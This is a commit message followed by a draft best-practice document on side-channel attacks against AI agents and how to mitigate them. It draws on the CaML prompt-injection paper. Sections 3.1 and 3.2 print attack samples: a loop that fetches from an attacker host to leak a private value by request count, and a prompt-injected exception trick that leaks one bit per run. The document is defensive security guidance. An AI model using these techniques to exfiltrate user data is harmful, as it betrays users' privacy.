feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add full proposal system: DB schema (proposals + proposal_gaps tables), CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new. The new page merges AI intake (paste URL/text → Haiku generates multiple proposals auto-linked to gaps) with manual form entry. Generated proposals are clickable cards that fill the editor below for refinement. Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes CaML-inspired draft proposals from arXiv:2503.18813 analysis.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---

# Side-Channel Mitigation Framework for AI Agent Interactions

## 1. Problem Statement

Even when AI agent systems implement strong security measures (capability-based policies, control/data-flow integrity, Privileged/Quarantined execution), **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
3. **Timing side channels**: an adversary infers private values from execution timing differences

These are not theoretical: CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in its evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.

This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.

## 2. Scope

This document provides:

1. A **taxonomy of side-channel risks** specific to AI agent systems
2. **Mitigation strategies** for each risk category
3. **Tool API design guidelines** that minimize side-channel exposure
4. **Monitoring patterns** for detecting side-channel exploitation
5. **STRICT vs. NORMAL mode** recommendations

## 3. Side-Channel Taxonomy

### 3.1 External Resource Inference

**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value.

**CaML context**: In NORMAL mode, the loop body does not inherit dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var`, and policies can block it.

**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).

```
Attacker's Server
      │
      │  GET /cat.jpg ×10   ← private_var = 10
      │  GET /cat.jpg ×20   ← private_var = 20
      │
      └── attacker infers private_var by counting requests
```

### 3.2 Exception-Based Bit Leaking

**Attack**: The adversary prompt-injects the Processor (Q-LLM) into returning an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called, leaking one bit.

**CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).

```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY-OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception
```

**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).

### 3.3 Timing Side Channels

**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.

**CaML context**: CaML's restricted Python subset does not include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

**Bandwidth**: depends on timing precision; generally low but non-zero.

### 3.4 Agent-Specific Side Channels (Beyond CaML)

| Channel | Attack Vector | Bandwidth |
|---------|---------------|-----------|
| **Token usage** | Private data influences response length → observable token count | Medium |
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
| **Error message content** | Error details leak through supposedly sanitized channels | High |
| **Model confidence** | Probability distributions in structured output leak information | Low |
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |

## 4. Mitigation Strategies

### 4.1 STRICT Mode Execution

**Recommendation: Use STRICT mode for all security-sensitive agent operations.**

In STRICT mode:

- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
- This means a `fetch()` inside `for i in range(private_var)` carries `private_var` in its dependency graph
- Security policies can detect and block the side channel

**Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, and allow NORMAL mode only for explicitly low-sensitivity operations.

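The mechanism above can be sketched in a few lines. This is an illustrative model, not CaML's actual implementation: `Tracker` and `fetch` are hypothetical names, and real systems would track dependencies inside the interpreter rather than via an explicit helper.

```python
class Tracker:
    """Toy STRICT-mode control-dependency tracker (illustrative only)."""

    def __init__(self, strict=True):
        self.strict = strict
        self.control_deps = []  # label sets of enclosing conditions/iterators

    def loop(self, value, labels):
        """Iterate over a labeled value, recording the control dependency."""
        if self.strict:
            self.control_deps.append(set(labels))
        try:
            for i in range(value):
                yield i
        finally:
            if self.strict:
                self.control_deps.pop()

    def deps_of(self, data_labels):
        deps = set(data_labels)
        for frame in self.control_deps:
            deps |= frame  # STRICT: inherit labels from enclosing blocks
        return deps


def fetch(url, tracker, data_labels=()):
    # Policy: block external requests whose dependencies include private data.
    if "private" in tracker.deps_of(data_labels):
        raise PermissionError("blocked: external request depends on private data")
    return f"GET {url}"


tracker = Tracker(strict=True)
private_var = 10  # labeled "private"
try:
    for _ in tracker.loop(private_var, {"private"}):
        fetch("https://attacker.example/cat.jpg", tracker)
except PermissionError as e:
    print(e)  # the request-count channel is cut off before any request leaves
```

With `strict=False`, no control dependency is recorded and the same `fetch` goes through, which is exactly the NORMAL-mode gap described above.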
### 4.2 Exception Handling Hardening

**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**

Exceptions create side channels because they halt execution. Instead:

```python
# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except Exception:
    pass  # attacker observes: was email sent?

# MITIGATED: error value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way
```

Agent frameworks SHOULD:

- Use `Result`/`Either` types instead of exceptions for Processor outputs
- Ensure both success and failure paths make the same external observations
- Redact exception messages before they reach the Planner

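A minimal `Result` type is enough to make the mitigated pattern concrete. This is a sketch (the names `risky_operation`, `send_email`, and `handle` are hypothetical stand-ins; a production framework might use a library such as `returns` or a proper tagged union instead):

```python
from dataclasses import dataclass
from typing import Generic, Optional, TypeVar

T = TypeVar("T")


@dataclass
class Result(Generic[T]):
    value: Optional[T] = None
    error: Optional[str] = None

    def is_ok(self) -> bool:
        return self.error is None


def risky_operation(data: str) -> Result[str]:
    # Return an error value instead of raising, so execution never halts early.
    if not data:
        return Result(error="empty input")
    return Result(value=data.upper())


def send_email(body: str) -> str:
    return f"sent: {body}"  # stand-in for a real tool call


def handle(private_data: str) -> str:
    result = risky_operation(private_data)
    body = result.value if result.is_ok() else "default"
    return send_email(body)  # same observable tool call on both paths
```

Because `handle` calls `send_email` exactly once regardless of success or failure, the "was the email sent?" bit no longer depends on the private input.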
### 4.3 Constant-Pattern Tool Calls

**Recommendation: Where feasible, make tool call patterns independent of private data.**

- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to fixed lengths for sensitive operations

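The padding point can be sketched as follows (hypothetical helper; the `noop` tool and dict-based call format are assumptions, not an API this document defines):

```python
NOOP = {"tool": "noop", "args": {}}


def pad_calls(calls: list[dict], fixed_len: int) -> list[dict]:
    """Pad a tool-call batch with no-ops so the observable count is constant."""
    if len(calls) > fixed_len:
        raise ValueError("batch exceeds fixed length; split into fixed-size batches")
    return calls + [NOOP] * (fixed_len - len(calls))


# Two different private values produce the same observable call count:
batch_a = pad_calls([{"tool": "fetch", "args": {"id": i}} for i in range(3)], 8)
batch_b = pad_calls([{"tool": "fetch", "args": {"id": i}} for i in range(7)], 8)
assert len(batch_a) == len(batch_b) == 8
```

An observer counting calls learns only the padded length, not how many real items the private data produced; the no-ops must of course be indistinguishable from real calls at the point of observation.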
### 4.4 External Request Restrictions

**Recommendation: Restrict which external endpoints agents can contact.**

- Allowlist approved external domains
- Proxy all external requests through a controlled gateway
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection

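The four bullets above compose naturally into one gateway check. A minimal sketch (the `EgressGateway` class and its thresholds are hypothetical; a real deployment would enforce this on the network path, not in-process):

```python
from urllib.parse import urlparse


class EgressGateway:
    """Toy egress gateway: allowlist + per-session rate limit + request log."""

    def __init__(self, allowed_domains, max_requests_per_session=20):
        self.allowed = set(allowed_domains)
        self.max_requests = max_requests_per_session
        self.counts = {}  # session_id -> request count (denied requests count too)
        self.log = []     # (session_id, url, verdict) for anomaly detection

    def check(self, session_id: str, url: str) -> bool:
        host = urlparse(url).hostname or ""
        self.counts[session_id] = self.counts.get(session_id, 0) + 1
        if host not in self.allowed:
            verdict = "denied: domain not allowlisted"
        elif self.counts[session_id] > self.max_requests:
            verdict = "denied: session rate limit"
        else:
            verdict = "allowed"
        self.log.append((session_id, url, verdict))
        return verdict == "allowed"


gw = EgressGateway({"api.example.com"}, max_requests_per_session=2)
assert gw.check("s1", "https://api.example.com/v1/data")
assert not gw.check("s1", "https://attacker.example/cat.jpg")  # not allowlisted
```

Counting denied requests against the session budget is deliberate: it also throttles the probing pattern flagged in Section 6.1.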
## 5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

### 5.1 Do

- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document trust levels of output fields (which are public, which are private)

### 5.2 Don't

- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Use response timing that depends on input sensitivity
- Expose iteration counts or batch sizes in responses

### 5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

```json
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
```

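One way a planner might consume such an annotation, sketched under the assumption that the field names match the example JSON above (the `required_mode` policy itself is hypothetical):

```python
import json

annotation = json.loads("""
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
""")


def required_mode(ann: dict) -> str:
    props = ann["tool:side_channel_properties"]
    # Any externally observable behavior forces STRICT; otherwise honor the hint.
    if props["makes_external_requests"] or props["observable_by_third_parties"]:
        return "STRICT"
    return ann.get("tool:recommended_mode", "NORMAL")


assert required_mode(annotation) == "STRICT"
```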
## 6. Monitoring Patterns

### 6.1 Anomaly Detection Signals

| Signal | Potential Attack | Action |
|--------|------------------|--------|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side channel | Log + investigate |
| Tool call patterns differ from plan | Control-flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |

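As one concrete instance of the table's second row, a sliding-window exception-rate tracker is a few lines (the window size and threshold are illustrative assumptions, not recommended values):

```python
from collections import deque


class ExceptionRateTracker:
    """Flag a session for halt + review when exceptions become too frequent."""

    def __init__(self, window=20, max_rate=0.3):
        self.window = deque(maxlen=window)  # recent outcomes: True = exception
        self.max_rate = max_rate

    def record(self, raised_exception: bool) -> str:
        self.window.append(raised_exception)
        rate = sum(self.window) / len(self.window)
        # Exception-based bit leaking needs one exception per leaked bit,
        # so a sustained high rate is a strong signal of active exfiltration.
        return "halt_and_review" if rate > self.max_rate else "ok"


tracker = ExceptionRateTracker(window=10, max_rate=0.3)
verdicts = [tracker.record(i % 2 == 0) for i in range(10)]  # 50% exceptions
assert verdicts[-1] == "halt_and_review"
```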
### 6.2 Monitoring Architecture

```
Agent Execution
      │
      ├──► Side-Channel Monitor
      │        ├── Request pattern analyzer
      │        ├── Exception rate tracker
      │        ├── Timing variance detector
      │        └── Tool call pattern validator
      │                  │
      │                  ▼
      │        Alert / Halt Decision
      │
      ▼
Normal execution continues (if no anomaly)
```

## 7. Relationship to Other Drafts

| Draft | Side-Channel Relevance |
|-------|------------------------|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT-mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel and needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak information |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |

## 8. Security Considerations

This entire document is about security. Key meta-considerations:

- Side-channel mitigation is **defense in depth**: no single measure eliminates all channels
- The trade-off between security and utility is fundamental; complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve, so this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (it requires logging agent interactions)

## 9. Open Questions

1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How do we stay ahead?
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leaking more than single-agent channels)?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.